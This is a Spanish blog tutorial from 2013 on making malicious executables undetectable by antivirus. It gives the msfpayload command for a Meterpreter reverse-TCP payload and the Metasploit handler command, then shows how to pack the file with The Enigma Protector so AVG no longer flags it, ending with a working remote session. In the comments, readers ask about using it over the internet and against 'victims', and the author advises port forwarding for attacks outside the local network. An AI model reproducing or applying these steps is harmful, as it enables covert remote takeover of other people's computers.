miércoles, 4 de diciembre de 2013

Evadiendo antivirus

En este post veremos una técnica sencilla y efectiva de evadir antivirus.
Comunmente encontraras este tema como bypass antivurs, si buscas la definición por la web acerca de bypass antivirus te daras cuenta que no hay algo concreto, hacer un bypass simplemente es hacer que los antivirus no detecten nuestros programas maliciosos :D

Hay muchisimas técnicas para hacer este tipo de trabajos y se debe tomar en cuenta 2 puntos muy importantes:

El primer punto:
Si tenemos un antivirus como Avg, avast, avira, etc etc y hacemos una técnica de bypass y el antivirus que tengamos no detecta nuestro programa malicioso, eso no quiere decir que ningun antivirus vaya a detectar nuestro programa o que el bypass sea efectivo en todos los antivirus

El segundo punto:
probablemente nuestro bypass funcione por un tiempo pero como los antivirus se actualizan, pues es posible que con el tiempo nuestro bypass no funcione y cualquier antivirus nos detecte


























Para este ejercicio el antivirus que usaremos será el AVG 2014, aqui pongo la prueba que esta actualizado al fia de hoy (miercoles 4 de diciembre del 2013)


El programa que usaremos se llama The Enigma Protector, este es un sistema profesional para licencias y protección de archivos ejecutables en windows, The Enigma Protector es una herramienta escensial para cada desarrollador de software comercial.

¿Alguna vez tuvieron algun programa y aunque no era un virus o un programa malicioso su antivirus lo detectaba como si fuera un virus? si alguna vez les ha pasado tal vez con The Enigma protector puedan solucionar ese problema.


  


Bueno vamos sobre la practica, lo primero que debemos de hacer es nuestro payload
 ponemos el comando:
msfpayload windows/meterpreter/reverse_tcp lhost="mi ip local" lport=1234 X > /root/Desktop/virus.exe

supongo  que no es necesario explicar ese comando, si has dado con este blog y no sabes que es cada cosa que escribí en ese comando te sugiero buscar en google el curso que se llama
metasploit unleashed <-- es gratuito y esta muy bien explicado.




Este archivo llamado pacman.exe lo debemos pasar a nuestra maquina que tiene el sistema operativo windows y que tiene el The Enigma Protector instalado




Pero!!!! antes de pasar el archivo supongo que sería buena idea tener listo nuestro metasploit
ponemos el comando msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp lhost=192.168.1.71 lport=1234 E

Listo ya tenemos nuestro metasploit listo para tener una sesion de meterpreter cuando ejecuten nuestro pacman.exe, ahora antes de pasar nuestro pacman.exe hay que desactivar el antivirus, claro no para ejecutarlo sino para que el antivirus no vaya a borrar el archivo, recuerden que tenemos que modificarlo entonces desactivamos el antivirus para poder trabajar sobre el archivo pacman.exe



Una vez que hayamos desactivado el antivirus y hayamos copiado nuestro archivo pacman.exe a nuestro windows abrimos el programa The Enigma Protecto y damos click en Directorio





Una vez que hayamos dado click en Directorio buscamos nuestro archivo pacman.exe y damos click en el boton abrir, entonces ahora se nos mostrara que se va a crear un archivo llamado pacman_protected.exe solo tenemos que dar click en el boton proteger





Una vez que The Enigma Protector haya terminado el trabajo nos aparecerá de la siguiente manera y simplemente debemos dar click en el boton cerrar


Por ultimo cuando cerramos The Enigma protector nos pregunta si queremos salvar el proyecto, ahi simplemente le damos click en no




Aqui vemos como tenemos el archivo original pacman.exe y el archivo modificado pacman_protected.exe


Escaneemos el archivo pacman


Aqui podemos ver como AVG lo detecta rápidamente

Ahora hagamos el escaneo sobre el archivo pacman_protected



Vemos que el antivirus ahora no lo ha detectado, pero ahora debemos comprobar que nuestro archivo .exe sigue funcionando es decir nuestro payload no haya quedado "corrupto" por la modificacion que hicimos, entonces procedemos a ejecutarlo































Ahora veamos en nuestro kali que ha pasado




Como vemos tenemos meterpreter dentro del sistema veamos sobre que sistema operativo fue ejecutado nuestro payload



Bueno aqui podemos ver que esto funciona perfectamente con un antivirus actualizado y sobre un windows 7 actualizado y de 64 bits.

Es todo por el momento espero hayan disfrutado de este post :)










11 comentarios:

  1. Realmente muy bueno! pero quisiera que me saques de duda en algo, sólo funciona a nivel o local? o también funciona a través de red wan (internet) ?

    ResponderEliminar
    Respuestas
    1. silencio ZORRA, bien dice el autor si no sabe nada lea el manual.

      Eliminar
  2. Hola en este metodo mostre como funciona dentro de mi red local, para hacerlo fuera de la red sería el mismo proceso solo que el ip que usaria seria mi ip global, pero ademas de usar el ip global hay que modificar tu router para que tengas salida, saludos

    ResponderEliminar
    Respuestas
    1. lo de la ip pública lo entiendo, pero me podrías informar o ayudar en ese tema del router? que pasos debo seguir para poder configurarlo bien y tener salida como lo mencionas!

      Eliminar
    2. Pues mira cada router es diferente pero en escencia debes de abrir puertos y redireccionarlos hacia tu kali, en los cursos especializados que tenemos explicamos eso a fondo, o por otra parte tu mismo puedes ir descubriendo esas cosas, pero por lo pronto ya te pase el tip de donde tienes que hacer la configuracion para poder realizar tus ataques fuera de la red, saludos :D

      Eliminar
  3. Muy bueno el tuto. me podrias decir si funcina esmascarando Metlasploit con la pagina de facebook al enviar el archivo a una victima..??

    ResponderEliminar
    Respuestas
    1. No entiendo muy bien tu pregunta, sin embargo sería bueno que ti hicieras la prueba y nos comentaras como te fue :) saludos

      Eliminar
  4. Este comentario ha sido eliminado por el autor.

    ResponderEliminar
  5. Ese software funciona como modificar de firmas y sirve para diferentes av??

    ResponderEliminar
  6. el metodo de evasion de antivirus es efectivo aunque el av tenga activada la opcion escudo de comportamiento que ya viene por default en la mayoria de av ???

    ResponderEliminar
  7. como paso los archivos de linux a windows

    ResponderEliminar